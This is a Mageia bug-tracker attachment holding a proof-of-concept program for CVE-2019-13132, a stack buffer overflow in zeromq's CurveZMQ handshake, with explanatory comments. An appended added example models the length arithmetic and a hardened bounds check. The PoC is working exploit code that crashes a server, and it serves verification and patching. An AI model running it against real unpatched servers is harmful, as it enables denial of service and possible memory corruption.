Mageia Bugzilla – Attachment 11348 Details for Bug 25113: zeromq new security issue CVE-2019-13132
Combined server/client PoC file
repro.cc (text/x-csrc), 2.86 KB, created by Len Lawrence on 2019-11-09 20:29:11 CET
// CVE-2019-13132
// https://github.com/zeromq/libzmq/issues/3558
//
// Note: the asserts below carry side effects (bind, setsockopt, connect),
// so build this file without -DNDEBUG or the PoC does nothing.

#include <cassert>
#include <string>
#include <unistd.h>

#include <czmq.h>
#include <zmq.h>

int main() {
    zsys_init();

    // Generate CurveZMQ certificates (public/private key pairs actually) for server and client
    zcert_t *serverCert = zcert_new ();
    zcert_t *clientCert = zcert_new ();

    // Setup server socket
    zsock_t* serverSocket = zsock_new(ZMQ_ROUTER);
    // make the server use CURVE secure connection mode
    zsock_set_curve_server(serverSocket, 1);
    // set the server secret key
    zsock_set_curve_secretkey(serverSocket, zcert_secret_txt(serverCert));
    assert(zsock_bind(serverSocket, "tcp://127.0.0.1:7777") != -1);

    // Setup client socket
    zsock_t* clientSocket = zsock_new(ZMQ_DEALER);
    // Set the server public key
    zsock_set_curve_serverkey(clientSocket, zcert_public_txt(serverCert));
    // Set the key pair of the client
    zsock_set_curve_secretkey(clientSocket, zcert_secret_txt(clientCert));
    zsock_set_curve_publickey(clientSocket, zcert_public_txt(clientCert));
    // Set metadata properties on the client socket
    //
    // This puts a lot of data into the socket metadata, and ZMQ will use it to generate the handshake packet
    // for the CurveZMQ (CurveCP-derived) auth schema:
    //
    // https://github.com/zeromq/libzmq/blob/master/src/curve_client.cpp#L182
    //
    // We make the size huge so that it will overflow
    for (size_t i = 0; i < 200; ++i ) {
        std::string property(
            std::string("X-Property") + std::to_string(i) + std::string(":ABCDEFG0123456789")
        );
        assert(zmq_setsockopt (zsock_resolve(clientSocket), ZMQ_METADATA, property.c_str(), property.size()) == 0);
    }

    // This will initiate the connection to the server with our CurveZMQ auth packet and the oversize metadata in it.
    // 1. The server will get the message payload here:
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L274-L275
    //
    // 2. The size `clen` is calculated from the payload size minus the fixed length of the other parts of the payload
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L327
    //
    // 3. The memory for decrypting the crypto box is allocated on the stack with a fixed size
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L329-L331
    //
    // 4. The first overflow: the message data is copied into the fixed stack buffer without a bounds check
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L335-L336
    //
    // 5. The second overflow: the crypto box is decrypted and the oversize result is written into a fixed
    //    stack buffer
    //
    //    https://github.com/zeromq/libzmq/blob/master/src/curve_server.cpp#L342-L343
    //
    assert(zsock_connect(clientSocket, "tcp://127.0.0.1:7777") != -1);

    // Give the server thread time to process the INITIATE and crash
    sleep(10);

    zsys_shutdown();
    return 0;
}
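The following is an added example, not part of the attached PoC or of libzmq. It models the length handling the numbered comments describe: the box length is derived from the message size alone, then used for a copy into a fixed stack buffer. It also computes how many bytes the PoC's 200 metadata properties occupy once encoded in ZMTP 3.x property form (1-byte name length, name, 4-byte big-endian value length, value), so the size of the overrun is concrete. INITIATE_FIXED_LEN and INITIATE_BOX_CAP are assumed placeholders, not libzmq's real constants, and the vulnerable shape only reports the overrun instead of performing the out-of-bounds copy.

```c
/* Added example: length handling behind CVE-2019-13132, modelled, not libzmq's code.
 * INITIATE_FIXED_LEN and INITIATE_BOX_CAP are assumed placeholder values. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define INITIATE_FIXED_LEN 113u  /* assumed: INITIATE bytes that are not the crypto box */
#define INITIATE_BOX_CAP   256u  /* assumed: size of the fixed stack buffer the box is copied into */

/* Encode one name/value pair in ZMTP 3.x metadata form:
 * 1-byte name length, name, 4-byte big-endian value length, value.
 * Returns bytes written, or 0 if the property is invalid or does not fit in cap. */
size_t encode_property(const char *name, const char *value, uint8_t *out, size_t cap) {
    size_t nlen = strlen(name), vlen = strlen(value);
    size_t need = 1 + nlen + 4 + vlen;
    if (nlen == 0 || nlen > 255 || need > cap) return 0;
    out[0] = (uint8_t)nlen;
    memcpy(out + 1, name, nlen);
    out[1 + nlen] = (uint8_t)(vlen >> 24);
    out[2 + nlen] = (uint8_t)(vlen >> 16);
    out[3 + nlen] = (uint8_t)(vlen >> 8);
    out[4 + nlen] = (uint8_t)vlen;
    memcpy(out + 5 + nlen, value, vlen);
    return need;
}

/* Encoded size of the metadata the PoC sets: X-Property0..X-Property<count-1> = ABCDEFG0123456789.
 * The buffer is only scratch space; we need the total length, not the bytes. */
size_t poc_metadata_size(unsigned count) {
    uint8_t scratch[64];
    char name[32];
    size_t total = 0;
    for (unsigned i = 0; i < count; ++i) {
        snprintf(name, sizeof name, "X-Property%u", i);
        total += encode_property(name, "ABCDEFG0123456789", scratch, sizeof scratch);
    }
    return total;
}

/* Vulnerable shape (steps 2 and 4 above): clen comes from the message size alone and is then
 * used to copy into a fixed buffer. Returns how many bytes that copy would run past the buffer
 * (0 when it fits). No copy is performed here. Note the unsigned subtraction also wraps for
 * messages shorter than the fixed part, so those "overrun" by an enormous amount. */
size_t vulnerable_overrun(size_t msg_size) {
    size_t clen = msg_size - INITIATE_FIXED_LEN;
    return clen > INITIATE_BOX_CAP ? clen - INITIATE_BOX_CAP : 0;
}

/* Hardened shape: validate before any copy. Returns the checked box length, or -1 to reject
 * the INITIATE when the message is too short or the box would not fit the buffer. */
long hardened_box_len(size_t msg_size) {
    if (msg_size < INITIATE_FIXED_LEN) return -1;
    size_t clen = msg_size - INITIATE_FIXED_LEN;
    if (clen > INITIATE_BOX_CAP) return -1;
    return (long)clen;
}

int main(void) {
    size_t meta = poc_metadata_size(200);
    size_t msg = INITIATE_FIXED_LEN + meta;
    printf("encoded metadata: %zu bytes\n", meta);
    printf("vulnerable handler would overrun the %u-byte buffer by %zu bytes\n",
           INITIATE_BOX_CAP, vulnerable_overrun(msg));
    printf("hardened handler verdict: %ld (-1 = rejected)\n", hardened_box_len(msg));
    return 0;
}
```

The fix the model points at is the one a reviewer would demand in curve_server.cpp: the message length must be checked against both the fixed part and the capacity of the destination buffer before `clen` is used for any copy or decryption, and an oversize INITIATE must be rejected rather than processed.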